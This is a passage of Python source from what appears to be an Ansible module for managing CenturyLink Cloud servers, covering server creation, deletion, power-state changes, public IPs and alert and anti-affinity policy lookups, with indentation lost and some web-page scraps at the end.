# datacenter_networks = clc_sdk.v2.Networks(
# networks_lst=datacenter._DeploymentCapabilities()['deployableNetworks'])
# network_id = datacenter_networks.networks[0].id
# -- end
except CLCException:
module.fail_json(
msg=str(
"Unable to find a network in location: " +
datacenter.id))
return network_id
@staticmethod
def _find_aa_policy_id(clc, module):
"""
Validate if the anti affinity policy exist for the given name and throw error if not
:param clc: the clc-sdk instance
:param module: the module to validate
:return: aa_policy_id: the anti affinity policy id of the given name.
"""
aa_policy_id = module.params.get('anti_affinity_policy_id')
aa_policy_name = module.params.get('anti_affinity_policy_name')
if not aa_policy_id and aa_policy_name:
alias = module.params.get('alias')
aa_policy_id = ClcServer._get_anti_affinity_policy_id(
clc,
module,
alias,
aa_policy_name)
if not aa_policy_id:
module.fail_json(
msg='No anti affinity policy was found with policy name : %s' % aa_policy_name)
return aa_policy_id
@staticmethod
def _find_alert_policy_id(clc, module):
"""
Validate if the alert policy exist for the given name and throw error if not
:param clc: the clc-sdk instance
:param module: the module to validate
:return: alert_policy_id: the alert policy id of the given name.
"""
alert_policy_id = module.params.get('alert_policy_id')
alert_policy_name = module.params.get('alert_policy_name')
if not alert_policy_id and alert_policy_name:
alias = module.params.get('alias')
alert_policy_id = ClcServer._get_alert_policy_id_by_name(
clc=clc,
module=module,
alias=alias,
alert_policy_name=alert_policy_name
)
if not alert_policy_id:
module.fail_json(
msg='No alert policy exist with name : %s' % alert_policy_name)
return alert_policy_id
def _create_servers(self, module, clc, override_count=None):
"""
Create New Servers in CLC cloud
:param module: the AnsibleModule object
:param clc: the clc-sdk instance to use
:return: a list of dictionaries with server information about the servers that were created
"""
p = module.params
request_list = []
servers = []
server_dict_array = []
created_server_ids = []
partial_created_servers_ids = []
add_public_ip = p.get('add_public_ip')
public_ip_protocol = p.get('public_ip_protocol')
public_ip_ports = p.get('public_ip_ports')
params = {
'name': p.get('name'),
'template': p.get('template'),
'group_id': p.get('group'),
'network_id': p.get('network_id'),
'cpu': p.get('cpu'),
'memory': p.get('memory'),
'alias': p.get('alias'),
'password': p.get('password'),
'ip_address': p.get('ip_address'),
'storage_type': p.get('storage_type'),
'type': p.get('type'),
'primary_dns': p.get('primary_dns'),
'secondary_dns': p.get('secondary_dns'),
'additional_disks': p.get('additional_disks'),
'custom_fields': p.get('custom_fields'),
'ttl': p.get('ttl'),
'managed_os': p.get('managed_os'),
'description': p.get('description'),
'source_server_password': p.get('source_server_password'),
'cpu_autoscale_policy_id': p.get('cpu_autoscale_policy_id'),
'anti_affinity_policy_id': p.get('anti_affinity_policy_id'),
'packages': p.get('packages'),
'configuration_id': p.get('configuration_id'),
'os_type': p.get('os_type')
}
count = override_count if override_count else p.get('count')
changed = False if count == 0 else True
if not changed:
return server_dict_array, created_server_ids, partial_created_servers_ids, changed
for i in range(0, count):
if not module.check_mode:
req = self._create_clc_server(clc=clc,
module=module,
server_params=params)
server = req.requests[0].Server()
request_list.append(req)
servers.append(server)
self._wait_for_requests(module, request_list)
self._refresh_servers(module, servers)
ip_failed_servers = self._add_public_ip_to_servers(
module=module,
should_add_public_ip=add_public_ip,
servers=servers,
public_ip_protocol=public_ip_protocol,
public_ip_ports=public_ip_ports)
ap_failed_servers = self._add_alert_policy_to_servers(clc=clc,
module=module,
servers=servers)
for server in servers:
if server in ip_failed_servers or server in ap_failed_servers:
partial_created_servers_ids.append(server.id)
else:
# reload server details
server = clc.v2.Server(server.id)
server.data['ipaddress'] = server.details[
'ipAddresses'][0]['internal']
if add_public_ip and len(server.PublicIPs().public_ips) > 0:
server.data['publicip'] = str(
server.PublicIPs().public_ips[0])
created_server_ids.append(server.id)
server_dict_array.append(server.data)
return server_dict_array, created_server_ids, partial_created_servers_ids, changed
def _enforce_count(self, module, clc):
"""
Enforce that there is the right number of servers in the provided group.
Starts or stops servers as necessary.
:param module: the AnsibleModule object
:param clc: the clc-sdk instance to use
:return: a list of dictionaries with server information about the servers that were created or deleted
"""
p = module.params
changed = False
count_group = p.get('count_group')
datacenter = ClcServer._find_datacenter(clc, module)
exact_count = p.get('exact_count')
server_dict_array = []
partial_servers_ids = []
changed_server_ids = []
# fail here if the exact count was specified without filtering
# on a group, as this may lead to a undesired removal of instances
if exact_count and count_group is None:
return module.fail_json(
msg="you must use the 'count_group' option with exact_count")
servers, running_servers = ClcServer._find_running_servers_by_group(
module, datacenter, count_group)
if len(running_servers) == exact_count:
changed = False
elif len(running_servers) < exact_count:
to_create = exact_count - len(running_servers)
server_dict_array, changed_server_ids, partial_servers_ids, changed \
= self._create_servers(module, clc, override_count=to_create)
for server in server_dict_array:
running_servers.append(server)
elif len(running_servers) > exact_count:
to_remove = len(running_servers) - exact_count
all_server_ids = sorted([x.id for x in running_servers])
remove_ids = all_server_ids[0:to_remove]
(changed, server_dict_array, changed_server_ids) \
= ClcServer._delete_servers(module, clc, remove_ids)
return server_dict_array, changed_server_ids, partial_servers_ids, changed
@staticmethod
def _wait_for_requests(module, request_list):
"""
Block until server provisioning requests are completed.
:param module: the AnsibleModule object
:param request_list: a list of clc-sdk.Request instances
:return: none
"""
wait = module.params.get('wait')
if wait:
# Requests.WaitUntilComplete() returns the count of failed requests
failed_requests_count = sum(
[request.WaitUntilComplete() for request in request_list])
if failed_requests_count > 0:
module.fail_json(
msg='Unable to process server request')
@staticmethod
def _refresh_servers(module, servers):
"""
Loop through a list of servers and refresh them.
:param module: the AnsibleModule object
:param servers: list of clc-sdk.Server instances to refresh
:return: none
"""
for server in servers:
try:
server.Refresh()
except CLCException as ex:
module.fail_json(msg='Unable to refresh the server {0}. {1}'.format(
server.id, ex.message
))
@staticmethod
def _add_public_ip_to_servers(
module,
should_add_public_ip,
servers,
public_ip_protocol,
public_ip_ports):
"""
Create a public IP for servers
:param module: the AnsibleModule object
:param should_add_public_ip: boolean - whether or not to provision a public ip for servers. Skipped if False
:param servers: List of servers to add public ips to
:param public_ip_protocol: a protocol to allow for the public ips
:param public_ip_ports: list of ports to allow for the public ips
:return: none
"""
failed_servers = []
if not should_add_public_ip:
return failed_servers
ports_lst = []
request_list = []
server = None
for port in public_ip_ports:
ports_lst.append(
{'protocol': public_ip_protocol, 'port': port})
try:
if not module.check_mode:
for server in servers:
request = server.PublicIPs().Add(ports_lst)
request_list.append(request)
except APIFailedResponse:
failed_servers.append(server)
ClcServer._wait_for_requests(module, request_list)
return failed_servers
@staticmethod
def _add_alert_policy_to_servers(clc, module, servers):
"""
Associate the alert policy to servers
:param clc: the clc-sdk instance to use
:param module: the AnsibleModule object
:param servers: List of servers to add alert policy to
:return: failed_servers: the list of servers which failed while associating alert policy
"""
failed_servers = []
p = module.params
alert_policy_id = p.get('alert_policy_id')
alias = p.get('alias')
if alert_policy_id and not module.check_mode:
for server in servers:
try:
ClcServer._add_alert_policy_to_server(
clc=clc,
alias=alias,
server_id=server.id,
alert_policy_id=alert_policy_id)
except CLCException:
failed_servers.append(server)
return failed_servers
@staticmethod
def _add_alert_policy_to_server(
clc, alias, server_id, alert_policy_id):
"""
Associate an alert policy to a clc server
:param clc: the clc-sdk instance to use
:param alias: the clc account alias
:param server_id: The clc server id
:param alert_policy_id: the alert policy id to be associated to the server
:return: none
"""
try:
clc.v2.API.Call(
method='POST',
url='servers/%s/%s/alertPolicies' % (alias, server_id),
payload=json.dumps(
{
'id': alert_policy_id
}))
except APIFailedResponse as e:
raise CLCException(
'Failed to associate alert policy to the server : {0} with Error {1}'.format(
server_id, str(e.response_text)))
@staticmethod
def _get_alert_policy_id_by_name(clc, module, alias, alert_policy_name):
"""
Returns the alert policy id for the given alert policy name
:param clc: the clc-sdk instance to use
:param module: the AnsibleModule object
:param alias: the clc account alias
:param alert_policy_name: the name of the alert policy
:return: alert_policy_id: the alert policy id
"""
alert_policy_id = None
policies = clc.v2.API.Call('GET', '/v2/alertPolicies/%s' % alias)
if not policies:
return alert_policy_id
for policy in policies.get('items'):
if policy.get('name') == alert_policy_name:
if not alert_policy_id:
alert_policy_id = policy.get('id')
else:
return module.fail_json(
msg='multiple alert policies were found with policy name : %s' % alert_policy_name)
return alert_policy_id
@staticmethod
def _delete_servers(module, clc, server_ids):
"""
Delete the servers on the provided list
:param module: the AnsibleModule object
:param clc: the clc-sdk instance to use
:param server_ids: list of servers to delete
:return: a list of dictionaries with server information about the servers that were deleted
"""
terminated_server_ids = []
server_dict_array = []
request_list = []
if not isinstance(server_ids, list) or len(server_ids) < 1:
return module.fail_json(
msg='server_ids should be a list of servers, aborting')
servers = clc.v2.Servers(server_ids).Servers()
for server in servers:
if not module.check_mode:
request_list.append(server.Delete())
ClcServer._wait_for_requests(module, request_list)
for server in servers:
terminated_server_ids.append(server.id)
return True, server_dict_array, terminated_server_ids
@staticmethod
def _start_stop_servers(module, clc, server_ids):
"""
Start or Stop the servers on the provided list
:param module: the AnsibleModule object
:param clc: the clc-sdk instance to use
:param server_ids: list of servers to start or stop
:return: a list of dictionaries with server information about the servers that were started or stopped
"""
p = module.params
state = p.get('state')
changed = False
changed_servers = []
server_dict_array = []
result_server_ids = []
request_list = []
if not isinstance(server_ids, list) or len(server_ids) < 1:
return module.fail_json(
msg='server_ids should be a list of servers, aborting')
servers = clc.v2.Servers(server_ids).Servers()
for server in servers:
if server.powerState != state:
changed_servers.append(server)
if not module.check_mode:
request_list.append(
ClcServer._change_server_power_state(
module,
server,
state))
changed = True
ClcServer._wait_for_requests(module, request_list)
ClcServer._refresh_servers(module, changed_servers)
for server in set(changed_servers + servers):
try:
server.data['ipaddress'] = server.details[
'ipAddresses'][0]['internal']
server.data['publicip'] = str(
server.PublicIPs().public_ips[0])
except (KeyError, IndexError):
pass
server_dict_array.append(server.data)
result_server_ids.append(server.id)
return changed, server_dict_array, result_server_ids
@staticmethod
def _change_server_power_state(module, server, state):
"""
Change the server powerState
:param module: the module to check for intended state
:param server: the server to start or stop
:param state: the intended powerState for the server
:return: the request object from clc-sdk call
"""
result = None
try:
if state == 'started':
result = server.PowerOn()
else:
# Try to shut down the server and fall back to power off when unable to shut down.
result = server.ShutDown()
if result and hasattr(result, 'requests') and result.requests[0]:
return result
else:
result = server.PowerOff()
except CLCException:
module.fail_json(
msg='Unable to change power state for server {0}'.format(
server.id))
return result
@staticmethod
def _find_running_servers_by_group(module, datacenter, count_group):
"""
Find a list of running servers in the provided group
:param module: the AnsibleModule object
:param datacenter: the clc-sdk.Datacenter instance to use to lookup the group
:param count_group: the group to count the servers
:return: list of servers, and list of running servers
"""
group = ClcServer._find_group(
module=module,
datacenter=datacenter,
lookup_group=count_group)
servers = group.Servers().Servers()
running_servers = []
for server in servers:
if server.status == 'active' and server.powerState == 'started':
running_servers.append(server)
return servers, running_servers
@staticmethod
def _find_group(module, datacenter, lookup_group=None):
"""
Find a server group in a datacenter by calling the CLC API
:param module: the AnsibleModule instance
:param datacenter: clc-sdk.Datacenter instance to search for the group
:param lookup_group: string name of the group to search for
:return: clc-sdk.Group instance
"""
if not lookup_group:
lookup_group = module.params.get('group')
try:
return datacenter.Groups().Get(lookup_group)
except CLCException:
pass
# The search above only acts on the main
result = ClcServer._find_group_recursive(
module,
datacenter.Groups(),
lookup_group)
if result is None:
module.fail_json(
msg=str(
"Unable to find group: " +
lookup_group +
" in location: " +
datacenter.id))
return result
@staticmethod
def _find_group_recursive(module, group_list, lookup_group):
"""
Find a server group by recursively walking the tree
:param module: the AnsibleModule instance to use
:param group_list: a list of groups to search
:param lookup_group: the group to look for
:return: list of groups
"""
result = None
for group in group_list.groups:
subgroups = group.Subgroups()
try:
return subgroups.Get(lookup_group)
except CLCException:
result = ClcServer._find_group_recursive(
module,
subgroups,
lookup_group)
if result is not None:
break
return result
@staticmethod
def _create_clc_server(
clc,
module,
server_params):
"""
Call the CLC Rest API to Create a Server
:param clc: the clc-python-sdk instance to use
:param module: the AnsibleModule instance to use
:param server_params: a dictionary of params to use to create the servers
:return: clc-sdk.Request object linked to the queued server request
"""
try:
res = clc.v2.API.Call(
method='POST',
url='servers/%s' %
(server_params.get('alias')),
payload=json.dumps(
{
'name': server_params.get('name'),
'description': server_params.get('description'),
'groupId': server_params.get('group_id'),
'sourceServerId': server_params.get('template'),
'isManagedOS': server_params.get('managed_os'),
'primaryDNS': server_params.get('primary_dns'),
'secondaryDNS': server_params.get('secondary_dns'),
'networkId': server_params.get('network_id'),
'ipAddress': server_params.get('ip_address'),
'password': server_params.get('password'),
'sourceServerPassword': server_params.get('source_server_password'),
'cpu': server_params.get('cpu'),
'cpuAutoscalePolicyId': server_params.get('cpu_autoscale_policy_id'),
'memoryGB': server_params.get('memory'),
'type': server_params.get('type'),
'storageType': server_params.get('storage_type'),
'antiAffinityPolicyId': server_params.get('anti_affinity_policy_id'),
'customFields': server_params.get('custom_fields'),
'additionalDisks': server_params.get('additional_disks'),
'ttl': server_params.get('ttl'),
'packages': server_params.get('packages'),
'configurationId': server_params.get('configuration_id'),
'osType': server_params.get('os_type')}))
result = clc.v2.Requests(res)
except APIFailedResponse as ex:
return module.fail_json(msg='Unable to create the server: {0}. {1}'.format(
server_params.get('name'),
ex.response_text
))
#
# Patch the Request object so that it returns a valid server
# Find the server's UUID from the API response
server_uuid = [obj['id']
for obj in res['links'] if obj['rel'] == 'self'][0]
# Change the request server method to a _find_server_by_uuid closure so
# that it will work
result.requests[0].Server = lambda: ClcServer._find_server_by_uuid_w_retry(
clc,
module,
server_uuid,
server_params.get('alias'))
return result
@staticmethod
def _get_anti_affinity_policy_id(clc, module, alias, aa_policy_name):
"""
retrieves the anti affinity policy id of the server based on the name of the policy
:param clc: the clc-sdk instance to use
:param module: the AnsibleModule object
:param alias: the CLC account alias
:param aa_policy_name: the anti affinity policy name
:return: aa_policy_id: The anti affinity policy id
"""
aa_policy_id = None
try:
aa_policies = clc.v2.API.Call(method='GET',
url='antiAffinityPolicies/%s' % alias)
except APIFailedResponse as ex:
return module.fail_json(msg='Unable to fetch anti affinity policies for account: {0}. {1}'.format(
alias, ex.response_text))
for aa_policy in aa_policies.get('items'):
if aa_policy.get('name') == aa_policy_name:
if not aa_policy_id:
aa_policy_id = aa_policy.get('id')
else:
return module.fail_json(
msg='multiple anti affinity policies were found with policy name : %s' % aa_policy_name)
return aa_policy_id
#
# This is the function that gets patched to the Request.server object using a lamda closure
#
@staticmethod
def _find_server_by_uuid_w_retry(
clc, module, svr_uuid, alias=None, retries=5, back_out=2):
"""
Find the clc server by the UUID returned from the provisioning request. Retry the request if a 404 is returned.
:param clc: the clc-sdk instance to use
:param module: the AnsibleModule object
:param svr_uuid: UUID of the server
:param retries: the number of retry attempts to make prior to fail. default is 5
:param alias: the Account Alias to search
:return: a clc-sdk.Server instance
"""
if not alias:
alias = clc.v2.Account.GetAlias()
# Wait and retry if the api returns a 404
while True:
retries -= 1
try:
server_obj = clc.v2.API.Call(
method='GET', url='servers/%s/%s?uuid=true' %
(alias, svr_uuid))
server_id = server_obj['id']
server = clc.v2.Server(
id=server_id,
alias=alias,
server_obj=server_obj)
return server
except APIFailedResponse as e:
if e.response_status_code != 404:
return module.fail_json(
msg='A failure response was received from CLC API when '
'attempting to get details for a server: UUID=%s, Code=%i, Message=%s' %
(svr_uuid, e.response_status_code, e.message))
if retries == 0:
return module.fail_json(
msg='Unable to reach the CLC API after 5 attempts')
time.sleep(back_out)
back_out *= 2
@staticmethod
def _set_user_agent(clc):
if hasattr(clc, 'SetRequestsSession'):
agent_string = "ClcAnsibleModule/" + __version__
ses = requests.Session()
ses.headers.update({"Api-Client": agent_string})
ses.headers['User-Agent'] += " " + agent_string
clc.SetRequestsSession(ses)
def main():
"""
The main function. Instantiates the module and calls process_request.
:return: none
"""
argument_dict = ClcServer._define_module_argument_spec()
module = AnsibleModule(supports_check_mode=True, **argument_dict)
clc_server = ClcServer(module)
clc_server.process_request()
if __name__ == '__main__':
main()
| [
"[email protected]"
]
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.